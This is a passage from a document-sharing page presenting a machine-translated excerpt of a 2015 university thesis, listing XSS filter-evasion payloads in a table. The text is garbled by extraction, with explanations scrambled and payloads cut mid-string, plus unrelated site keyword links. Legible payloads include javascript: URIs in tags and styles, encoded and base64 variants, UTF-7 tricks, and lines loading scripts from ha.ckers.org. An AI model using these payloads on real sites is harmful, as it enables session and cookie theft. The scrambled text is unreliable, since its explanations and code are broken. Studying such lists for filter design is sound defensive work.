Ish Bitiruv malakasi mstu im. N. E. Bauman Kochetkov Pavel 2015 yil


Mavjud XSS in'ektsiyalari ro'yxati



Download 2,03 Mb.
Pdf ko'rish
bet5/16
Sana20.07.2022
Hajmi2,03 Mb.
#827608
1   2   3   4   5   6   7   8   9   ...   16
Bog'liq
2015 Kochetkov P rpz (1)

1.1.3. Mavjud XSS in'ektsiyalari ro'yxati


Machine Translated by Google


filtrlash tizimi
IMG tegining atributlari
fromCharCode va uni bajaring
Amalga oshirish
funktsiyalari
etishmayotgan atribut
vergul bilan
i
iqtiboslar
ushbu hodisa uchun ishlov beruvchi
XSS filtrlari o'tadi
Atribut qiymatini qoldiring
bu faqat tekshiradi
xatolar,
Apostroflardan foydalanish
Sun'iy ravishda
Qo'shtirnoq va nuqtalarning etishmasligi
eval() funktsiyasidan foydalanish;
Yordam bering
go'shakni qo'yish
Harflar katta-kichikligiga sezgir
noto'g'ri
erishish
Qo'shtirnoq va nuqtalarning etishmasligi
js-da qatorni to'plang
bu zaiflik.
bo'sh
SRC atributi
hammasi
18
filtrlangan, mumkin
tirnoq o'rniga. Ko'pchilik
Kasrdan foydalaning
vergul bilan
Filtrni chetlab o'tishga imkon beradi
Agar a





'XSS'")`>
onerror="alert(String.fromCharCode(88,83,83))">
SRC=javasc
mg>
))>

">
SRC=javascript:alert(String.fromCharCode(88,83,83)
Machine Translated by Google


19
HTML belgilari havolalari,
olti burchakli havolalar
HTML kodini qayta ishlash
HTML belgilari havolalari,
Foydalanish
HTML belgilar havolalari
belgidan keyin
yodda kodlangan
brauzer qachon o'chirilgan
HTML kodini qayta ishlash
HTML belgilar bo'yicha, holda;
O'rnatilgan TAB belgisi,
brauzer qachon o'chirilgan
HTML belgilarga havolalar,
tarjima
Foydalanish
Kasrdan foydalaning
ramzi
HTML kodini qayta ishlash
holda; belgidan keyin
TAB belgisidan foydalanib,
chiziqlar,
brauzer qachon o'chirilgan
yodda kodlangan
rt('XSSS
alert('’
#0000108ert�
000112t:a&
')>

88;SS')>
0040'XSS

SRC=javasc&#x
SRC=jav

27)>
14;ipt:
72ipt:ale
7scri�
Machine Translated by Google


kengaytma
ichida
yodda kodlangan
ichida
bunday XSS in'ektsiyasi
ochiq va yopiq qavslar
NetScape.
amalga oshiradi
tarjima
Foydalanish
skript
atributlar
asos
javascript kodi.
yopiladi
FireFox
JS
HTML kodini qayta ishlash
avtomatik ravishda
HTML belgilari havolalari,
tasvirlar
Yopilmagan




Foydalanish uslubi
fon
agar uy egasi AQShga uzatayotgan bo'lsa
Xususiyat
CSS fayliga JS skriptini yozing.
preprocessor @import
i
in'ektsiyani yashirish
Foydalanish uslubi
Uslublar jadvalini ga o'zgartirish
ko'p filtrlarni chetlab o'tish
i
kodlash. 7 bitli ASCII
JS skriptini CSS fayliga yozing
uchun

javascript:
foydalanish
va protokol
ASCII kodlash
NetScape va IE da ishlaydi
CSS fayliga JS skriptini yozing
STYLE
kontent, lekin faqat ishlaydi
javascript
foydalanish
o'rniga 8. Bu XSS mumkin
fikr bildirish,
ramzi
javascript protokoli:
22
Noto'g'ri ishlatilgan
va teg bilan qo'shish
i
fon tasviri
REL=uslublar jadvali">
HREF="javascript:alert('XSS');">
YLE>
type="text/css">BODY{background:url("javascript:
>

image:url("javascript:alert('XSS')");}¼skript¾ogohlantirish(¢XSS¢)¼/skript¾
Content=";
CLASS=XSS>


ishlatilgan,

SRC="javascript:alert('XSS');">
URL=http://;URL=javascript:alert('XSS');">
base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3Nj
cmlwdD4K">
Machine Translated by Google



bundan
elementi
Fon rasmi

tasvir
qo'shimcha
Foydalanish
sahifa
ob'ektlar, keyin
bundan
atribut ORGAN FOYDA u
Fon rasmi

Agar xizmat ko'rsatsa
imkoniyat
base64 havolasini shifrlash
foydalanuvchi
qilish imkonini ham beradi
belgilar
Foydalanish
va ixtiyoriy
hujum qilish uchun

Foydalanish
elementi
fon
ortiqcha
javascript-ni joylashtirishingiz mumkin
qo'shish
bundan
24
Shifrlangan javascript ichida
Shuningdek, hujum ostida
javascript
z0iaHR0cDovL3d3dy53My5vcmcv
SRC="ma'lumotlar:image/svg+xml;base64,PHN2ZyB4bWx
BACKGROUND="javascript:alert('XSS')">
url(javascript:alert('XSS'))">
uczpzdmc9Imh0dH
\0073\0063\0072\0069\0070\0074\003a\0061\006c\0
29'\0029">
BACKGROUND="javascript:alert('XSS')">
CT>
065\0072\0074\0028.1027\0058.1053\0053\0027\00
DATA="http://ha.ckers.org/scriptlet.html">EMBED SRC="http://ha.ckers.org/xss.swf"
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuc
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi
url(javascript:alert('XSS'))">
rasm:\0075\0072\006C\0028'\006a\0061\0076\0061
AllowScriptAccess="always">
Machine Translated by Google


25
amalga oshirish
tom ma'noda, lekin
.jpg kengaytmasi bilan
qo'llab-quvvatlaydigan brauzer
Cookie-fayllar ham
Faylga javascript yozish,
nomidan harakat qilish
UTF-7 skriptni bajaradi
Qayerda saytlarda ishlaydi
mumkin
ruxsat berilgan
'); ?>
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQv
nd.php?somevariables=maliciouscode">
TYPE" CONTENT="text/html; charset=UTF-7">
type="image/svg+xml"
AllowScriptAccess="always">
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="
ogohlantirish('XSS')SRC="http://ha.ckers.org/xss.jpg">
8vd3d3LnczLm9yZy8xOTk5L3hs
T>">


SRC="http://ha.ckers.org/xss.js">

SRC="http://ha.ckers.org/xss.js">
PT


Download 2,03 Mb.

Do'stlaringiz bilan baham:
1   2   3   4   5   6   7   8   9   ...   16




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish